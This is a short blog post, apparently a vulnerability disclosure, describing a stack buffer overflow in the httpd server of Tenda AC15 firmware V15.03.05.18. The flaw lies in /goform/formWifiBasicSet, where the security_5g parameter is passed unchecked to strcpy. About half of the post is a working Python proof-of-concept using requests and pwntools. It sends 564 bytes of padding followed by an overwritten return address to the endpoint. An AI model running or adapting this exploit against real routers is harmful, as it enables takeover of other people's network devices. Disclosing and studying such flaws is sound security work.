Tenda has stack overflow

Tenda ac15 firmware V15.03.05.18 httpd server has stack buffer overflow in /goform/formWifiBasicSet.

User contorl pointer src by parameter security_5g in web requesting and then using 'strcpy' copy to stack without length limit will cause stack overflow

import requests
from pwn import *

url = ''
pl = 'a'*564+p32(0xdeadbeef)
data = {'security_5g':pl, 'hideSsid':'1', 'ssid':'1', 'security':'1', 'wrlPwd':'1', 'hideSsid_5g':'1', 'ssid_5g':'1', 'wrlPwd_5g': '1'}

requests.post(url, data=data)

posted @ 2022-07-28 10:01  Amalll  阅读(360)  评论(0编辑  收藏  举报